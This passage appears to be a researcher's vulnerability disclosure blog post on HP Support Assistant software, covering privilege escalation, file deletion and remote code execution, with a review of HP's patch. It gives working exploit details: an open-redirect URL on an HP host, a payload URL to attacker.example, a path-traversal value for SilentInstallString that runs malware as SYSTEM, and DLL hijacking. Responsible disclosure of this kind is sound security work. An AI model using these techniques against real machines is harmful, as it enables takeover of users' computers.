After 90 days from the date of submission, these reports are made public.</p><p>So I need an open redirect primitive, how can I use OpenBugBounty to find one? Google it!</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/4dRK91H.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><p>Nice, we got a few options, let&#x2019;s look at the first one.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/Tdv3xe3.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><p>An unpatched bug, just what we wanted. We can test the open redirect vulnerability by going to a URL like <a href="https://ers.rssx.hp.com/ers/redirect?targetUrl=https://google.com">https://ers.rssx.hp.com/ers/redirect?targetUrl=https://google.com</a> and landing on Google, thanks <a href="https://www.openbugbounty.org/researchers/TvM/">TvM</a> and HP negligence (it&apos;s been 5 months since I re-reported this open redirect bug and it&apos;s still unpatched)!</p><p>Back to the method, this open redirect bug is on the host <code>ers.rssx.hp.com</code> which does end in <code>.hp.com</code> making it a perfect candidate for an attack. We can redirect to our own web server where the file is stored to make the method download any file we want.</p><p>The next barrier is being able to place the file where we want. This is pretty simple, because HP didn&#x2019;t do safe path string concatenation. We can just set the action item base <code>ExecutableName</code> property to be a relative path such as <code>../../something</code> allowing us to easily control the download location.</p><p>We don&#x2019;t have to worry about MD5 verification if we just pass something other than &quot;PrinterDriver&quot; for the <code>ActionType</code> property.</p><p>The final check is the verification of the downloaded file&#x2019;s signature. 
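</p><p>To recap the URL gate we just slipped through, here is a Python sketch of the host check as described (a reconstruction, not HP&apos;s code); the attacker domain in the example is a placeholder:</p>

```python
from urllib.parse import urlparse

ALLOWED_SUFFIXES = (".hp.com", ".hpicorp.net")

def url_host_allowed(download_url: str) -> bool:
    """Reconstruction of the download-URL check: only the host's suffix
    is inspected, and redirect targets are never re-validated."""
    host = urlparse(download_url).hostname or ""
    return host.endswith(ALLOWED_SUFFIXES)

# Passes the check, yet the HTTP client silently follows the redirect
# to an attacker-controlled server ("attacker.example" is a placeholder):
redirect_url = ("https://ers.rssx.hp.com/ers/redirect"
                "?targetUrl=https://attacker.example/payload.exe")
```

<p>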
Let&#x2019;s quickly review the method.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/xhIfrs8.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/kbL0Sc1.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><blockquote>If the file is not signed and the <code>shouldDelete</code> argument is true, the method will delete the downloaded file and return that the download failed.</blockquote><p>The <code>shouldDelete</code> argument is the first argument passed to the <code>VerifyDownloadSignature</code> method. I didn&#x2019;t want to spoil it in discovery, but this is hilarious because, as you can see in the picture above, the first argument to <code>VerifyDownloadSignature</code> is <em>always false.</em> This means that even if the downloaded file fails signature verification, since <code>shouldDelete</code> is always false, the file won&#x2019;t be deleted. I really don&#x2019;t know how to explain this one&#x2026; did an HP developer just have a brain fart? Whatever the reason, it made my life a whole lot easier.</p><p>At the end of the day, we can place any file anywhere we want in the context of a SYSTEM process, allowing for escalation of privileges.</p><h2 id="discovery-local-privilege-escalation-5">Discovery: Local Privilege Escalation #5</h2><p>The next protected method we&#x2019;ll be looking at is <code>CreateInstantTask</code>. For our purposes, this is a pretty simple function to review.</p><p>The method takes in three arguments. 
The String parameter <code>updatePath</code>, which represents the path to the update binary; the name of the update; and the arguments to pass to the update binary.</p><p>The first verification step is checking the path of the update binary.<br></p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/soV0fXf.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><p>This verification method will first ensure that the update path is an absolute path that does not lead to a junction or reparse point. Good job on HP for checking this.</p><p>The next check is that the update path &quot;starts with&quot; a whitelisted base path. For my 64-bit machine, <code>MainAppPath</code> expands to <code>C:\Program Files (x86)\Hewlett Packard\HP Support Framework</code> and <code>FrameworkPath</code> expands to <code>C:\Program Files (x86)\Hewlett Packard\HP Support Solutions</code>.</p><p>What this check essentially means is that since our path has to be absolute AND must start with a path to HP&#x2019;s Program Files directory, the update path must actually be inside their installation folder.</p><p>The final verification step is ensuring that the update path points to a binary signed by HP.</p><p>If all of these checks pass, the method creates a Task Scheduler task to be executed immediately by an Administrator. If any Administrator is logged on, the binary is immediately executed.</p><h2 id="exploitation-local-privilege-escalation-5">Exploitation: Local Privilege Escalation #5</h2><p>A tricky one. Our update path must be something in HP&#x2019;s folders, but what could that be? This stumped me for a while, but I got a spark of an idea while brainstorming.</p><p>We have the ability to start ANY program in HP&#x2019;s installation folder with ANY arguments. Interesting. What types of binaries do HP&#x2019;s installation folders have? 
Are any of them interesting?</p><p>I found a few interesting binaries in the whitelisted directories, such as <code>Extract.exe</code> and <code>unzip.exe</code>. On older versions, we could use <code>unzip.exe</code>, but a new update implements a signature check. <code>Extract.exe</code> didn&#x2019;t even work when I tried to use it normally. I peeked at several binaries in dnSpy and I found an interesting one, <code>HPSF_Utils.exe</code>.</p><p>When the binary was started with the argument &quot;encrypt&quot; or &quot;decrypt&quot;, the method below would be executed.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/qJgG7Pv.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><p>If we passed &quot;encrypt&quot; as the first argument, the method would take the second argument, read it in and encrypt it, then write it to the file specified at the third argument. If we passed &quot;decrypt&quot;, it would do the same thing except read in an encrypted file and write the decrypted version to the third argument path.</p><p>If you haven&#x2019;t caught on yet, this is so useful because we can abuse the decrypt functionality to write a malicious file anywhere in the system, easily allowing us to escalate privileges. Since this binary is in the whitelisted path, we can execute it and abuse it to gain Administrator, because we can write anything to anywhere.</p><h1 id="arbitrary-file-deletion-vulnerabilities">Arbitrary File Deletion Vulnerabilities</h1><h2 id="discovery-arbitrary-file-deletion">Discovery: Arbitrary File Deletion</h2><p>Let&#x2019;s start with some arbitrary file deletion vulnerabilities. 
Although file deletion probably won&#x2019;t lead to Local Privilege Escalation, I felt that it was serious enough to report because I could <em>seriously</em> mess up a victim&#x2019;s machine by abusing HP&#x2019;s software.</p><p>The protected method we&#x2019;ll be looking at is <code>LogSoftPaqResults</code>. This method is very short for our purposes; all we need to read are the first few lines.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/l4xaVbd.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><p>When the method is called, it will combine the temporary path <code>C:\Windows\TEMP</code> and the <code>ExecutableName</code> from the <em>untrusted</em> action item base using an unsafe string concatenation. If the file at this path exists AND it is not signed by HP, it will go ahead and delete it.</p><h2 id="exploitation-arbitrary-file-deletion-1">Exploitation: Arbitrary File Deletion #1</h2><p>This is a pretty simple bug. Since HP uses unsafe string concatenation on path strings, we can just escape out of the <code>C:\Windows\TEMP</code> directory via relative path escapes (i.e. <code>../</code>) to reach any file we want.</p><p>If that file exists and isn&#x2019;t signed by HP, the method, which runs in the context of a SYSTEM process, will delete that file. This is pretty serious because imagine if I ran this on the entirety of your system32 folder. That would definitely not be good for your computer.</p><h2 id="exploitation-arbitrary-file-deletion-2">Exploitation: Arbitrary File Deletion #2</h2><p>This bug was even simpler than the last one, so I decided not to create a dedicated discovery section. 
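Before moving on, the traversal primitive behind that first deletion bug can be condensed into a few lines. This is a hypothetical reconstruction of the flawed pattern, not HP's actual code; `ntpath` is used so the Windows path semantics can be demonstrated on any platform:

```python
import ntpath

# Hypothetical reconstruction of the vulnerable logic described above:
# a trusted base directory naively concatenated with an untrusted name.
TEMP_DIR = r"C:\Windows\TEMP"

def vulnerable_delete_target(executable_name: str) -> str:
    # Unsafe: plain string concatenation, no validation of the untrusted name.
    return TEMP_DIR + "\\" + executable_name

def safe_delete_target(executable_name: str) -> str:
    # Safer pattern: resolve the path, then verify it stays inside the base.
    candidate = ntpath.normpath(ntpath.join(TEMP_DIR, executable_name))
    if not candidate.startswith(TEMP_DIR + "\\"):
        raise ValueError("path escapes the temporary directory")
    return candidate

# An attacker-controlled ExecutableName full of relative path escapes
# resolves well outside C:\Windows\TEMP:
escaped = ntpath.normpath(vulnerable_delete_target(r"..\..\Important\victim.txt"))
print(escaped)  # C:\Important\victim.txt
```

The difference between the two helpers is exactly the difference between string concatenation and a resolve-then-verify containment check.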
Let&#x2019;s jump into the past and look at the protected method <code>UncompressCabFile</code>.<br>When the method starts, as we reviewed before, the following is checked:</p><ol><li><code>cabFilePath</code> (path to the cabinet file to extract) exists.</li><li><code>cabFilePath</code> is signed by HP.</li><li>Our token is &quot;trusted&quot; and the <code>cabFilePath</code> contains a few pre-defined paths.</li></ol><p>If these conditions are not met, the method will delete the file specified by <code>cabFilePath</code>.</p><p>If we want to delete a file, all we need to do is specify pretty much any path in the <code>cabFilePath</code> argument and let the method delete it while running as the SYSTEM user.</p><h1 id="remote-code-execution-vulnerability">Remote Code Execution Vulnerability</h1><h2 id="discovery">Discovery</h2><p>For most of this report we&#x2019;ve reviewed vulnerabilities inside the HP service. In this section, we&#x2019;ll explore a different HP binary. The methods reviewed in &quot;General Exploitation&quot; will not apply to this bug.</p><p>When I was looking for attack surfaces for Remote Code Execution, one of the first things I checked for was registered URL Protocols. Although I could find these manually in regedit, I opted to use the tool <a href="http://www.nirsoft.net/utils/url_protocol_view.html">URLProtocolView</a>. This neat tool will allow us to easily enumerate the existing registered URL Protocols and what command line they execute.</p><p>Scrolling down to &quot;hp&quot; after sorting by name showed quite a few options.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/AUMTYDb.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><p>The first one looked mildly interesting because the product name of the binary was &quot;HP Download and Install Assistant&quot;. Could this <em>assist</em> me in achieving Remote Code Execution? 
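As background, a registered URL protocol maps a scheme to a command line stored in the registry (under the scheme's shell\open\command key), and when the scheme is invoked, for instance from an iframe, the shell substitutes the full URI for the %1 placeholder. A minimal sketch of that substitution; the handler path and URI below are illustrative placeholders, not HP's actual registration:

```python
# Sketch of URL protocol dispatch: the shell substitutes the invoked URI
# for "%1" in the registered command template. The handler path and URI
# here are made-up placeholders for illustration.
def build_handler_command(command_template: str, uri: str) -> str:
    return command_template.replace("%1", uri)

template = r'"C:\Example\Handler.exe" "%1"'
cmd = build_handler_command(template, "hpdia://remotefile=https://...")
print(cmd)
```

The key takeaway is that the entire URI, including any attacker-chosen parameters, lands on the handler's command line, which is why merely loading a crafted scheme URI can drive a program's argument parser.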
Let&#x2019;s pop it open in dnSpy.</p><p>The first thing the program does is throw the passed command line arguments into its custom argument parser. Here are the arguments we can pass into this program:</p><ol><li><code>remotefile</code> = The URL of a remote file to download.</li><li><code>filetitle</code> = The name of the file downloaded.</li><li><code>source</code> = The &quot;launch point&quot; or the source of the launch.</li><li><code>caller</code> = The calling process name.</li><li><code>cc</code> = The country used for localization.</li><li><code>lc</code> = The language used for localization.</li></ol><p>After parsing out the arguments, the program starts creating a &quot;download request&quot;. The method will read the download history to see if the file was already downloaded. If it wasn&#x2019;t downloaded before, the method adds the download request into the download requests XML file.</p><p>After creating the request, the program will &quot;process&quot; the XML data from the history file. For every pending download request, the method will create a downloader.</p><p>It is during this creation that the first integrity checks are done. The constructor for the downloader first extracts the filename specified in the <code>remotefile</code> argument. It parses the name out by finding the last index of the character <code>/</code> in the <code>remotefile</code> argument and then taking the substring starting just after that index to the end of the string. For example, if we passed in <code>https://example.com/test.txt</code> for the remote file, the method would parse out <code>test.txt</code>.</p><p>If the file name contains a period, verification on the extension begins. First, the method parses the file extension by getting everything after the last period in the name. If the extension is <code>exe</code>, <code>msi</code>, <code>msp</code>, <code>msu</code>, or <code>p2</code>, then the download is marked as an installer. 
Otherwise, the extension must be one of 70 other whitelisted extensions. If the extension is not one of those, the download is cancelled.</p><p>After verifying the file extension, the complete file path is created.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/DFqv2lY.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><p>First, if the <code>lc</code> argument is <code>ar</code> (Arabic), <code>he</code> (Hebrew), <code>ru</code> (Russian), <code>zh</code> (Chinese), <code>ko</code> (Korean), <code>th</code> (Thai), or <code>ja</code> (Japanese), your file name is just the name extracted from the URL. Otherwise, your file name is the <code>filetitle</code> argument, <code>&#x2013;</code>, and the file name from the URL combined. Finally, the method will replace any invalid characters present in <a href="https://docs.microsoft.com/en-us/dotnet/api/system.io.path.getinvalidfilenamechars">Path.GetInvalidFileNameChars</a> with a space.</p><p>This sanitized file name is then combined with the current user&apos;s download folder + <code>HP Downloads</code>.</p><p>The next relevant step is for the download to begin; this is where the second integrity check happens. First, the remote file URL argument must begin with <code>https</code>. Next, a URI object is created for the remote file URL. The host of this URI must end with <code>.hp.com</code> or end with <code>.hpicorp.net</code>. Only if these checks are passed is the download started.</p><p>Once the download has finished, another check is done. Before the download is marked as downloaded, the program verifies the downloaded content. This is done by first checking if the download is an installer, which was set during the file name parsing stage. If the download is an installer, then the method will verify the certificate of the downloaded file. 
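Before continuing with the certificate check, the parsing and naming logic just described can be condensed into a short sketch. The function names are mine; the installer extensions and language codes come from the decompiled logic described above, while the "other whitelisted extensions" and the invalid-character set are abbreviated assumptions:

```python
# Minimal reconstruction of the downloader's parsing steps (assumptions
# noted below; this is a sketch, not HP's code).
INSTALLER_EXTS = {"exe", "msi", "msp", "msu", "p2"}
RAW_NAME_LANGS = {"ar", "he", "ru", "zh", "ko", "th", "ja"}
INVALID_CHARS = '<>:"/\\|?*'  # abbreviated stand-in for Path.GetInvalidFileNameChars

def parse_remote_name(remotefile: str) -> str:
    # Substring after the last '/' in the URL.
    return remotefile[remotefile.rfind("/") + 1:]

def is_installer(name: str) -> bool:
    return "." in name and name.rsplit(".", 1)[1].lower() in INSTALLER_EXTS

def local_file_name(remotefile: str, filetitle: str, lc: str) -> str:
    name = parse_remote_name(remotefile)
    if lc not in RAW_NAME_LANGS:
        # "\u2013" is the en dash separator described above.
        name = filetitle + "\u2013" + name
    return "".join(" " if c in INVALID_CHARS else c for c in name)
```

Note the property that matters later: with `lc` set to one of the raw-name languages, the on-disk filename is taken verbatim from the attacker-supplied URL.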
If the file is not an installer, no check is done.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/ChtyZuY.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><p>The first step of verifying the certificate of the file is to check that it matches the binary. The method does this by calling <a href="https://docs.microsoft.com/en-us/windows/win32/api/wintrust/nf-wintrust-winverifytrust">WinVerifyTrust</a> on the binary. The method does not care if the certificate is revoked. The next check is extracting the subject of the certificate. This subject field must contain, in any letter casing, <code>hewlett-packard</code>, <code>hewlett packard</code>, or <code>o=hp inc</code>.</p><p>When the client presses the open or install button on the form, this same check is done again, and then the file is started using C#&#x2019;s <a href="https://docs.microsoft.com/en-us/dotnet/api/system.diagnostics.process.start#System_Diagnostics_Process_Start">Process.Start</a>. There are no arguments passed.</p><h2 id="exploitation">Exploitation</h2><p>There are several ways to approach exploiting this program. In the next sections, I&#x2019;ll be showing different attack variants and the pros/cons of each one. Let&#x2019;s start by bypassing a check we need to get past for any variant: the URL check.</p><p>As we just reviewed, the remote URL passed must have a host that ends with <code>.hp.com</code> or <code>.hpicorp.net</code>. This is tricky because the verification method uses the safe and secure way of verifying the URL&#x2019;s host by first using C#&#x2019;s URI parser. Our host will really need to end with <code>.hp.com</code> or <code>.hpicorp.net</code>.</p><p>A previous vulnerability in this report had the same issue. 
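Both integrity checks described above reduce to simple string tests. A sketch of the logic as described, with function names of my own choosing:

```python
from urllib.parse import urlparse

# Sketch of the downloader's two string-based integrity checks as
# described above; the function names are mine.
ALLOWED_HOST_SUFFIXES = (".hp.com", ".hpicorp.net")
SUBJECT_MARKERS = ("hewlett-packard", "hewlett packard", "o=hp inc")

def url_allowed(url: str) -> bool:
    uri = urlparse(url)
    return (uri.scheme == "https" and uri.hostname is not None
            and uri.hostname.endswith(ALLOWED_HOST_SUFFIXES))

def subject_allowed(subject: str) -> bool:
    lowered = subject.lower()
    return any(marker in lowered for marker in SUBJECT_MARKERS)

# A whitelisted host with an open redirect sails straight through:
print(url_allowed("https://ers.rssx.hp.com/ers/redirect?targetUrl=https://attacker.example/x.zip"))  # True
# And the substring test accepts attacker-chosen subjects:
print(subject_allowed("O=Totally Not Hewlett Packard LLC"))  # True
```

The host check itself is done correctly (real URI parsing, suffix match), which is exactly why the open redirect, rather than a parser trick, is the bypass.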
If you haven&apos;t read <a>that section</a>, I would highly recommend it to understand where we got this magical open redirect vulnerability in one of HP&apos;s websites: <a href="https://ers.rssx.hp.com/ers/redirect?targetUrl=https://google.com">https://ers.rssx.hp.com/ers/redirect?targetUrl=https://google.com</a>.</p><p>Back to the verification method, this open redirect bug is on the host <code>ers.rssx.hp.com</code>, which does end in <code>.hp.com</code>, making it a perfect candidate for an attack. We can redirect to our own web server where we can host any file we want.</p><p>This sums up the &quot;general&quot; exploitation portion of the Remote Code Execution bugs. Let&#x2019;s get into the individual ones.</p><h3 id="remote-code-execution-variant-1">Remote Code Execution Variant #1</h3><p>The first way I would approach this is seeing what type of file we can have our victim download without the HP program thinking it&#x2019;s an installer. Only if it&#x2019;s an installer will the program verify its signature.</p><p>Looking at the whitelisted file extensions, we don&#x2019;t have that much to work with, but we have some options. One whitelisted option is <code>zip</code>; this could work. An ideal attack scenario would be a website telling you that you need a critical update, the downloader suddenly popping up with the HP logo, and the victim pressing open on the zip file and executing a binary inside it.</p><p>To have a valid remote file URL, we will need to abuse the open redirect bug. 
I put my bad file on my web server and just put the URL to the zip file at the end of the open redirect URL.</p><p>When the victim visits my malicious website, an iframe with the <code>hpdia://</code> URL Protocol is loaded and the download begins.</p><p>This attack is somewhat lame because it requires two clicks to RCE, but I still think it&#x2019;s more than a valid attack method since the HP downloader looks pretty legit.</p><h3 id="remote-code-execution-variant-2">Remote Code Execution Variant #2</h3><p>My next approach is definitely more interesting than the last. In this method, we first make the program download a DLL file which is NOT an installer, then we install a signed HP binary that depends on this DLL.</p><p>Similar to our DLL Hijacking attack in the <a>third Local Privilege Escalation vulnerability</a>, we can use any signed binary which imports a DLL that doesn&#x2019;t exist. By simply naming our malicious DLL to the missing DLL name, the executed signed program will end up loading our malicious DLL, giving us Remote Code Execution.</p><p>Here&#x2019;s the catch. We&#x2019;re going to have to set the language of the downloader to Arabic, Hebrew, Russian, Chinese, Korean, Thai, or Japanese. The reason is that for DLL Hijacking, we need to set our malicious DLL&#x2019;s name to exactly that of the missing DLL.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/ZHhKhcV.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><p>If you recall the <code>CreateLocalFilename</code> method, the actual filename will have <code>&#x2013;</code> in it if the language we pass in through arguments is not one of those languages. 
If we do pass in a language that&#x2019;s one of the ones checked for in the function above, the filename will be the filename specified in the remote URL.</p><p>If your target victim is in a country where one of these languages is spoken commonly, this is, in my opinion, the best attack route. Otherwise, it may be a bit of an optimistic approach.</p><p>Whenever the victim presses any of the open or install all buttons, the signed binary will start and load our malicious DLL. If your victim is in an English-speaking country or only speaks English, this may be a little more difficult.</p><p>You could have the website present a critical update guide telling the visitor what button to press to update their system, but I am not sure if a user is more likely to press a button in a foreign language or open a file in a zip they opened.</p><p>At the end of the day, this is a one-click-only attack method, and it would work phenomenally in a country that uses the mentioned languages. This variant can also be used after detecting the victim&#x2019;s language and checking whether it&#x2019;s one of the few languages this variant supports. You can see the victim&#x2019;s language in HTTP headers or just the <a href="https://developer.mozilla.org/en-US/docs/Web/API/NavigatorLanguage/language">&quot;navigator language&quot;</a> in JavaScript.</p><h3 id="remote-code-execution-variant-3">Remote Code Execution Variant #3</h3><p>The last variant for achieving remote code execution is a bit optimistic about how many resources the attacker has, but I don&#x2019;t think it&#x2019;s a significant barrier for an APT.</p><p>To review, if the extension of the file we&#x2019;re downloading is considered an installer (see installer extensions in discovery), our binary will be checked for HP&#x2019;s signature. 
Let&#x2019;s take a look at the signature check.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/CEzzNb1.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><p>The method takes in a file name and first verifies that it&#x2019;s a valid certificate. This means a certificate ripped from a legitimate HP binary won&#x2019;t work because it won&#x2019;t match the binary. The concerning part is the check for whether the certificate is an HP certificate.</p><p>To be considered an HP certificate, the subject of the certificate must contain, in any letter casing, <code>hewlett-packard</code>, <code>hewlett packard</code>, or <code>o=hp inc</code>. This is a pretty inadequate check, especially that lower case conversion. Here are a few example companies I can form that would pass this check:</p><ol><li>[something]hewlett PackArd[something]</li><li>HP Inc[something]</li></ol><p>I could probably spend days making up company names. All an attacker needs to do is create an organization that contains any of those words and they can get a certificate for that company. Next thing you know, they can have a one-click RCE for anyone that has the HP bloatware installed.</p><h1 id="proof-of-concept">Proof of Concept</h1><h2 id="local-privilege-escalation-vulnerabilities-1">Local Privilege Escalation Vulnerabilities</h2><h2 id="remote-code-execution-vulnerabilities">Remote Code Execution Vulnerabilities</h2><h1 id="remediation">&quot;Remediation&quot;</h1><p>HP had their initial patch finished three months after I sent them the report of my findings. When I first heard they were aiming to patch 10 vulnerabilities in such a reasonable time-frame, I was impressed because it appeared like they were being a responsible organization that took security vulnerabilities seriously. 
This was in contrast to the performance I saw last year with my research into <a href="https://d4stiny.github.io/Remote-Code-Execution-on-most-Dell-computers/">Remote Code Execution</a> in Dell&apos;s bloatware where they took 6 months to deliver a patch for a <em>single</em> vulnerability, an absurd amount of time.</p><p>In the following section, I&apos;ll be going over the vulnerabilities HP did not patch or patched inadequately. Here is an overview of what was actually patched:</p><ol><li>Local Privilege Escalation #1 &#x2013; Patched &#x2714;&#xFE0F;</li><li>Local Privilege Escalation #2 &#x2013; Unpatched &#x274C;</li><li>Local Privilege Escalation #3 &#x2013; Unpatched &#x274C;</li><li>Local Privilege Escalation #4 &#x2013; &quot;Patched&quot; &#x1F615; (not really)</li><li>Local Privilege Escalation #5 &#x2013; Unpatched &#x274C;</li><li>Arbitrary File Deletion #1 &#x2013; Patched &#x2714;&#xFE0F;</li><li>Arbitrary File Deletion #2 &#x2013; Patched &#x2714;&#xFE0F;</li><li>Remote Code Execution Variant #1 &#x2013; Patched &#x2714;&#xFE0F;</li><li>Remote Code Execution Variant #2 &#x2013; Patched &#x2714;&#xFE0F;</li><li>Remote Code Execution Variant #3 &#x2013; Patched &#x2714;&#xFE0F;</li></ol><h2 id="re-discovery">Re-Discovery</h2><h3 id="new-patch-new-vulnerability">New Patch, New Vulnerability</h3><p>The largest change observed is the transition from the hardcoded &quot;C:\Windows\TEMP&quot; temporary directory to relying on the <strong>action item base supplied by the client</strong> to specify the temporary directory.</p><p>I am not sure if HP PSIRT did not review the patch or if HP has a lack of code review in general, but this transition actually <em>introduced</em> a new vulnerability. 
Now, instead of having a trusted hardcoded string be the deciding factor for the temporary directory&#x2026; HP relies on <strong>untrusted client data</strong> (the action item base).</p><p>As an attacker, my <em>unprivileged</em> process is what decides the value of the temporary directory used by the <em>elevated</em> agent, not the privileged service process, allowing for simple spoofing. This was one of the more shocking components of the patch. HP had not only left some vulnerabilities unpatched, but in doing so had ended up making some code worse than it was. This change mostly impacted the Local Privilege Escalation vulnerabilities.</p><h3 id="local-privilege-escalation-2-1">Local Privilege Escalation #2</h3><p>Looking over the new <code>InstallSoftpaqsSilently</code> method, the primary changes are:</p><ol><li>The untrusted <code>ActionItemBase</code> specifies the temporary directory.</li><li>There is more insecure path concatenation (path1 + path2 versus C#&#x2019;s <a href="https://docs.microsoft.com/en-us/dotnet/api/system.io.path.combine">Path.Combine</a>).</li><li>There is more verification on the path specified by the temporary directory and executable name (i.e. checking for relative path escapes, NTFS reparse points, rooted paths, etc.).</li></ol><p>The core problems that persist even after patching:</p><ol><li>The path that is executed by the method still utilizes unvalidated untrusted client input. Specifically, the method splits the item property <code>SilentInstallString</code> by double quote and utilizes values from that array for the name of the binary. This binary name is not validated besides a simple check to see if the file exists. No guarantees it isn&#x2019;t an attacker&#x2019;s binary.</li><li>There is continued use of insecure coding practices involving paths. 
For example, HP consistently concatenates paths by using the string combination operator versus using a secure concatenation method such as <a href="https://docs.microsoft.com/en-us/dotnet/api/system.io.path.combine">Path.Combine</a>.</li></ol><p>In order to have a successful call to <code>InstallSoftpaqsSilently</code>, you must now meet these requirements:</p><ol><li>The file specified by the <code>TempDirectory</code> property + <code>ExecutableName</code> property must exist.</li><li>The file specified by <code>TempDirectory</code> property + <code>ExecutableName</code> property must be signed by HP.</li><li>The path specified by <code>TempDirectory</code> property + <code>ExecutableName</code> property must pass the <code>VerifyHPPath</code> requirements:<br>a.	The path cannot contain relative path escapes.<br>b.	The path must be a rooted path.<br>c.	The path must not be a junction point.<br>d.	The path must start with an HP path.</li><li>The <code>SilentInstallString</code> property must contain the <code>SPName</code> property + <code>.exe</code>.</li><li>The directory name is the <code>TempDirectory</code> property + <code>swsetup\</code> + the <code>ExecutableName</code> property with <code>.exe</code> stripped.</li><li>The Executable Name is specified in the <code>SilentInstallString</code> property split by double quote. If the split has a size greater than 1, it will take the second element as EXE Name, else the first element.</li><li>The Executable Name must not contain <code>.exe</code> or <code>.msi</code>; otherwise, the Directory Name + <code>\</code> + the Executable Name must exist.</li><li>The function executes the binary specified at Directory Name + <code>\</code> + Executable Name.</li></ol><p>The core point of attack is outlined in steps 6 and 7. 
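The quote-splitting and path construction in steps 5 through 8 can be sketched in a few lines. The property names are HP's; the helper itself is my reconstruction, using `ntpath` so the Windows path semantics can be checked on any platform:

```python
import ntpath

# Reconstruction of the patched InstallSoftpaqsSilently path construction
# from the steps above (helper name is mine, not HP's).
def resolve_executed_path(temp_directory: str, executable_name: str,
                          silent_install_string: str) -> str:
    # Step 6: the executable name comes from splitting the untrusted
    # SilentInstallString on double quotes.
    parts = silent_install_string.split('"')
    exe_name = parts[1] if len(parts) > 1 else parts[0]
    # Step 5: directory = TempDirectory + swsetup\ + ExecutableName sans .exe.
    directory = ntpath.join(temp_directory, "swsetup",
                            executable_name.replace(".exe", ""))
    # Step 8: the service executes Directory Name + \ + Executable Name.
    return ntpath.normpath(ntpath.join(directory, exe_name))

path = resolve_executed_path(
    r"C:\Program Files (x86)\Hewlett-Packard\HP Support Framework",
    "HPSF.exe",
    '"..\\..\\..\\..\\..\\Malware\\malware.exe')
print(path)  # C:\Malware\malware.exe
```

Because the relative path escapes survive into the final path, the "must start with an HP path" check on the concatenated string does nothing to constrain where the resolved binary actually lives.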
We can control the Executable Name by formulating a malicious payload for the <code>SilentInstallString</code> item property that escapes a legitimate directory passed in the <code>TempDirectory</code> property into an attacker-controlled directory.</p><p>For example, if we pass:</p><ol><li><code>C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\</code> for the <code>TempDirectory</code> property.</li><li><code>HPSF.exe</code> for the <code>ExecutableName</code> property.</li><li><code>malware</code> for the <code>SPName</code> property.</li><li><code>&quot;..\..\..\..\..\Malware\malware.exe</code> (quote at beginning intentional) for the <code>SilentInstallString</code> property.</li></ol><p>The service will execute the binary at <code>C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\swsetup\HPSF\..\..\..\..\..\Malware\malware.exe</code>, which ends up resolving to <code>C:\Malware\malware.exe</code>, thus executing the attacker-controlled binary as SYSTEM.</p><h3 id="local-privilege-escalation-3-1">Local Privilege Escalation #3</h3><p>The primary changes for the new <code>InstallSoftpaqsDirectly</code> method are:</p><ol><li>The untrusted <code>ActionItemBase</code> specifies the temporary directory.</li><li>Invalid binaries are no longer deleted.</li></ol><p>The only thing we need to change in our proof of concept is to provide our own <code>TempDirectory</code> path. 
That&#x2019;s&#x2026; it.</p><h3 id="local-privilege-escalation-4">Local Privilege Escalation #4</h3><p>For the new <code>DownloadSoftpaq</code> method, the primary changes are:</p><ol><li>The download URL cannot have query parameters.</li></ol><p>The core problems that persist even after patching:</p><ol><li>Insecure validation of the download URL.</li><li>Insecure validation of the downloaded binary.</li><li>Open Redirect bug on <code>ers.rssx.hp.com</code>.</li></ol><p>First of all, HP still only does a basic check on the hostname to ensure it ends with a whitelisted host; however, this does not address the core issue that this check in itself is insecure.</p><p>Simply checking the hostname leaves the program exposed to Man-in-the-Middle attacks, other Open Redirect vulnerabilities, and virtual-host-based attacks (i.e. a subdomain that points to 127.0.0.1).</p><p>For an unknown reason, HP still does not delete the binary downloaded if it does not have an HP signature because HP passes the constant <code>false</code> for the parameter that indicates whether or not to delete a bad binary.</p><p>At the end of the day, this is still a patched vulnerability since at this time you can&#x2019;t quite exploit it, but I wouldn&#x2019;t be surprised to see this exploited in the future.</p><h3 id="local-privilege-escalation-5">Local Privilege Escalation #5</h3><p>This vulnerability was completely untouched. 
